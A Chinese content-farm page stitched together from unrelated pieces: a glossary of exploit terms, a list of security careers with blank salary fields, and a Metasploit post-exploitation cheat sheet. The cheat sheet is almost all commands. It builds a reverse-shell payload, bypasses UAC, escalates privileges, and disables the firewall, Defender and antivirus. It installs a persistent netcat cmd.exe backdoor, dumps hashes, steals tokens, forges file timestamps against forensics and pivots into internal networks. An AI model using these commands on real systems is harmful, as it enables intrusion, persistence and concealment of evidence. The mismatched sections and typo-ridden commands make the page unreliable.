小高技术网-免费分享创业技术、为农村创业者服务!
当前位置: 小高技术网 > 技术常识4>正文

渗透测试学什么系统好

2023-03-30 02:54:01 技术常识4 解决方法

【温馨提示】本文共有3385个字,预计阅读完需要9分钟,请仔细阅读哦!


NISP中渗透测试小白需要记录的专业术语,下面一起来看看本站小编网安世纪小刘给大家精心整理的答案,希望对您有帮助

渗透测试学什么系统好1

在学习渗透测试的过程中,我们常会遇到或挺好一些专用的词语,今天给大家简单的总结一下,方便以后在工作领域能够更好的运用

一、POC、EXP、Payload与Shellcode常用的词语都代表了什么

POC:全名'ProofofConcept',汉语'概念验证',常指一段系统漏洞证明的编码。

EXP:全名'Exploit',汉语'利用',指运用安全漏洞开展攻击姿势。

Payload:汉语'有效载荷',指取得成功exploit以后,真正在总体目标系统软件实施的编码或命令。

Shellcode:简单翻译'shell编码',是Payload的一种,因其创建正方向/反方向shell而出名。

二、需要注意点在哪里

POC就是用来证实系统漏洞存有的,EXP就是用来运用系统漏洞的,二者一般并不是一类,换句话说,PoC一般是无害,Exp一般是有影响的,拥有POC,才会EXP。

Payload有许多种,它能是Shellcode,可以直接是一段DOS命令。同一个Payload可用作好几个系统漏洞,但每个系统漏洞都有它自已的EXP,换句话说不会有通用EXP。

Shellcode也有很多种,包含正面的,反方向的,乃至meterpreter。

Shellcode与Shellshcok不是一个,Shellshock专指14年找到的Shellshock系统漏洞。

三、Payload模块

在MetasploitFramework6大控制模块中有一个Payload控制模块,在这个控制模块底下Single、Stager、Stages这三种类型,Single是一个all-in-one的Payload,不依附别的文件,而且它的容积会非常大,Stager主要运用于当总体目标计算机的内存比较有限时,可以直接传送一个比较小的Stager用以建立连接,Stages指运用Stager创建连接免费下载后续Payload。Stager和Stages都是有多种类型,适用不一样情景。

以上内容全部都是在网安伴资讯了解道的,关注NISP管理中心,有更多精彩内容同步,与智者携手一起,向未来启新程。

渗透测试学什么系统好2

前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,信息安全位列第一。

对于网络安全的发展与就业前景,知了姐说过很多,作为当下应届生收入较高的专业之一,网络安全同样也在转行领域占据热门位置,主要具备以下几点转行优势:

①行业人才缺口大,至2027年我国网安人才缺口将达327万

②知识体系友好,计算机及英语水平相对薄弱的同学也可学习上手

③入行门槛低,大专学历即可学习就业

④薪资起点高

⑤就业选择范围广,一个专业包含十余种岗位

岗位丰富,选择空间大,决定职业发展的高度,这也是网络安全备受青睐的原因之一,本期,我们就来盘一盘网络安全专业都有哪些重点就业岗位吧,要找工作的同学记得收藏呀~

网络安全岗位知多少?

岗位一:渗透测试

岗位释义:模拟黑客攻击,利用黑客技术,挖掘漏洞,提出修复建议。有些大厂,例如奇安信,甚至会将渗透岗位分为红蓝两方,对候选人的技术要求比较高,大部分刚入行的新人,也将渗透岗位作为后期的发展目标。

岗位职责:

①负责对客户网络、系统、应用进行渗透测试、安全评估和安全加固

②在出现网络攻击或安全事件时,提供应急响应服务,帮助用户恢复系统及调查取证

③针对客户网络架构,建议合理的网络安全解决方案

工作难度:5颗星

薪资现状:

岗位二:安全运维

岗位释义:维护网络系统的正常、安全运行,如果受到黑客攻击,则需要进行应急响应和入侵排查安全加固。很多刚毕业入行的新人,基本都从运维做起。

工作难度:3颗星

岗位职责:

①日常终端维护,操作系统安装加固

②完成网络安全设备故障排查、处置

③完成相关管理制度文档的编写和提交

薪资现状:

岗位三:安全运营

岗位释义:在运维的基础上,高效可持续地不断提升企业的安全防御能力的岗位。

岗位职责:

①负责监控、扫描等各类安全策略的制定和优化

②负责信息安全事件的应急响应

③参与网络安全评估工作、安全加固工作和监控等等

工作难度:3颗星

薪资现状:

岗位四:安全开发

岗位释义:顾名思义,对安全产品及平台、策略等进行开发工作。

岗位职责:

①负责网络安全产品的系统技术设计、代码开发与实现、单元测试、静态检查、本地构建等工作;

②参与公司其他产品的系统技术设计以及研发工作。

工作难度:5颗星

薪资现状:

岗位五:等保测评

岗位释义:等保测评也叫等级保护测评,主要负责开展信息安全等级保护测评、信息安全风险评估、应急响应、信息安全咨询等工作 。

岗位职责:

①网络安全等级保护测评项目实施;

②web渗透测试、操作系统安全加固等安全项目实施配合

工作难度:3颗星

薪资现状:

岗位六:安全研究

岗位释义:网络安全领域的研究人才。

岗位职责:

①跟踪和分析国内外安全事件、发展趋势和解决方案

②承担或参与创新型课题研究

③参与项目方案设计,组织推动项目落实,完成研究内容

④负责网络安全关键技术攻关和安全工具研发

工作难度:5颗星

薪资现状:

岗位七:网络工程师

岗位释义:主要负责对网络障碍的分析,及时处理和解决网络中出现的问题。

岗位职责:

①负责机房线路的布置和协议的规范工作

②利用网络测试分析仪,定期对现有的网络进行优化工作

工作难度:3颗星

薪资现状:

岗位八:安全管理工程师

岗位释义:负责信息安全相关流程、规范、标准的制定和评审,负责公司整体安全体系建设。

工作难度:4颗星

岗位九:售前工程师

岗位释义:负责网络安全售前产品交流,产品演示、技术讲解等工作

岗位职责:

①调研用户现状和安全需求,设计并编写售前技术方案

②编写招标文件,协助完成项目投标工作

③编制完善公司安全产品售前文档

⑤跟踪网络安全领域政策、标准、技术

工作难度:4颗星

薪酬现状:

岗位十:售后工程师

岗位释义:了解客户需求并协同相关部门进行产品实施部署,以及后期的需求跟踪及故障排除等工作

岗位职责:

①参与公司软件代码分析产品的安装部署、需求跟踪、效果反馈和总结

②定期拜访或回访现有用户,并根据客户需求结合公司产品新特性进行用户使用改善

③了解客户需求并协同相关部门进行产品实施部署,产品培训,故障排除,技术分析并提出解决方案或改进意见

工作难度:4颗星

薪酬现状:

写在最后

网络安全正处于高速发展阶段,不同的企业对于岗位的划分各有不同,但主要分为安全规划与设计、安全建设与实施、安全运行与维护、安全应急与防御、安全合规与管理等五大方向,因此对外开发的就业岗位多达十余种,本期知了姐仅针对重点岗位做盘点。

互联网时代的崛起,促使人工智能、物联网等产业不断发展,信息安全将是未来行业发展的重点议题,有转行想法的同学不要过多犹豫啦,抓住机会踩准风口,先人一步享受行业福利!

渗透测试学什么系统好3

  • 已经获得目标系统控制权后扩大战果
    • 提权
    • 信息收集
    • 渗透内网
    • 永久后门
  • 基于已有session扩大战果
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00"-e x86/shikata_ga_nai -f exe -o 1.exe

获取system账号权限

load priv getsystem #一般情况下就权限拒绝,下面就要用UAC绕过了

绕过UAC限制

use exploit/windows/local/ask set session set filename use exploit/windows/local/bypassuac use explot/windows/local/bypassuac_injuection set session set payload

利用漏洞直接提权为system

use exploit/windows/local/ms13_053_schlamperei use exploit/windows/local/ms13_081_track_popup_menu use exploit/windows/local/ms13_097_ie_registry_symlink use exploit/windows/local/ppr_flatten_rec

图形化payload

set payload windows/vncinject/reverse_tcp set viewonly no #可操作

hashdump

Psexec模块之Pass

use exploit/windows/smb/psexec set smbpass hash

需要提前关闭UAC

cmd.exe /k %windir%\Sysem32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWOED /d 1 /f

  • 关闭windows防火墙
#需要管理员或system权限 netsh advfirewall set allprofiles state off
  • 关闭Windefend
net stop windefend
  • Bitlocker磁盘加密
manage-bde -off C: #关闭磁盘加密 manage-bde -states C:
  • 关闭DEP
bcdedit.exe /set{current} nx AlwaysOff
  • 杀死防病毒软件
run killav run post/windows/manage/killav
  • 开启远程桌面服务
run post/windows/manage/enable_rdp run getgui -e run getgui -u yuanfh -p pass run multi_console_command -rc clean_up_20160824.1855.rc
  • 查看远程桌面
screenshot #截图 use espia screengrab

  • Tokens
    • 用户每次登录,账号绑定临时的Token
    • 访问资源时提交Token进行身份验证,类似于WEB Cookie
    • Delegate Token:交互登陆会话
    • Impersonate Token:非交互登录会话
    • Delegate Token账号注销后变为Impersonate Token,权限依然有效
  • Incognito
    • 独立功能的软件,被MSF集成在meterpreter中
    • 无需密码破解或获取密码HASH,窃取Token将自己伪装成其他用户
    • 尤其适用于域环境下提权、渗透多操作系统

list_tokens -u impersonate_token lab\\administrator
  • 运行以上命令需要getsystem
    • 本地普通权限用户需先本地提权

use exploit/windows/local/ms10_015_kitrap0d execute -f cmd.exe -i -t # -t:使用当前假冒的token执行程序 shell

  • 注册表保存着windows几乎全部配置参数
    • 如果修改不当,可直接造成系统崩溃
    • 修改前完整备份注册表
    • 某些注册表的修改是不可逆的
  • 常见用法
    • 修改、增加启动项
    • 窃取存储于注册表中的机密信息
    • 绕过文件型的病毒查杀

用注册表添加NC后门服务(meterpreter)

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传NC

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run #新建主键 #建立子键,给予赋值 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe' #查询是否成功 reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

  • 打开防火墙端口(meterpreter)
execute -f cmd -i -H netsh firewall show opmode netsh firewall add portopening TCP 444 "test" ENABLE ALL

  • 然后重启目标客户端
shutdown -r -t 0
  • 重启之后会自动运行nc

  • 然后直接连接即可

抓包

load sniffer #导入抓包模块 sniffer_interfaces sniffer_start 2 sniffe_dump 2 1.cap / sniffer_dump 2 1.cap
  • 在内存中缓存区块循环存储抓包(50000包),不写硬盘
  • 智能过滤meterpreter流量,传输全程使用SSL/TLS加密

解码

use auxiliary/sniffer/psnuffle set PCAPFILE 1.cap

搜索文件

search -f *.ini search -d c:\\document\ and\ settings\\administrator\\desktop\\ -f *.docx

John the Ripper破解弱口令

use post/windows/gather/hashdump #system权限的meterpreter run #结果保存在/tmp目录下

  • 文件系统访问会留下痕迹,电子取证重点关注
  • 渗透测试和攻击者往往希望销毁文件系统访问痕迹
  • 最好的避免被电子取证发现的方法:不要碰文件系统
    • Meterpreter的先天优势所在(完全基于内存)
  • MAC时间(Modified / Accessed / Changed)
ls -l --time=atime/ctime 1.txt stat 1.txt touch -d "2 days ago" 1.txt #修改时间 touch -t 1501010101 1.txt #年月日时分

MACE:MFT entry

  • MFT:NTFS文件系统的主文件分配表 Master File Table
  • 通常1024字节或2个硬盘扇区,其中存放多项entry信息
  • 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
  • 更多信息可研究,文件系统取证分析技术

Timestomp

timestomp -v 1.txt timestomp -f c:\\autoexec.bat 1.txt -b -r #擦除MACE时间信息,目前此参数功能失效 -m / -a / -c / -e / -z timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt

Pivoting跳板 / 枢纽 /支点

  • 利用已经控制的一台计算机作为入侵内网的跳板
  • 在其他内网计算机看来访问全部来自于跳板机
run autoroute -s 1.1.1.0/24 #不能访问外网的被攻击目标内网网段

自动路由 现实场景

  • 利用win攻击内网机器(对比XP有无外网访问权限的情况)
  • 扫描内网
use auxiliary/scanner/postscan/tcp

Pivoting端口转发Portfwd

  • 利用已经被控计算机,在kali与攻击目标之间实现端口转发
portfwd add -L LIP -l LPORT -r RIP -p RPORT portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389 portfwd list / delete / flush use exploit/windows/smb/ms08_067_netapi set RHOST 127.0.0.1 set LHOST 2.1.1.10 use exploit/multi/handler set exitonsession false


内容更新时间(UpDate): 2023年03月30日 星期四

版权保护: 【本文标题和链接】渗透测试学什么系统好 http://www.youmengdaxiazuofa.net/longxia8/97077.html






















你的评论更有价值!!!
  • 全部评论(0
    还没有评论,快来抢沙发吧!
博客主人百科博主
女,免费分享各种生活、电商知识、百科常识。
  • 文章总数
  • 100W+访问次数
  • 建站天数
  • {/dede:arclist}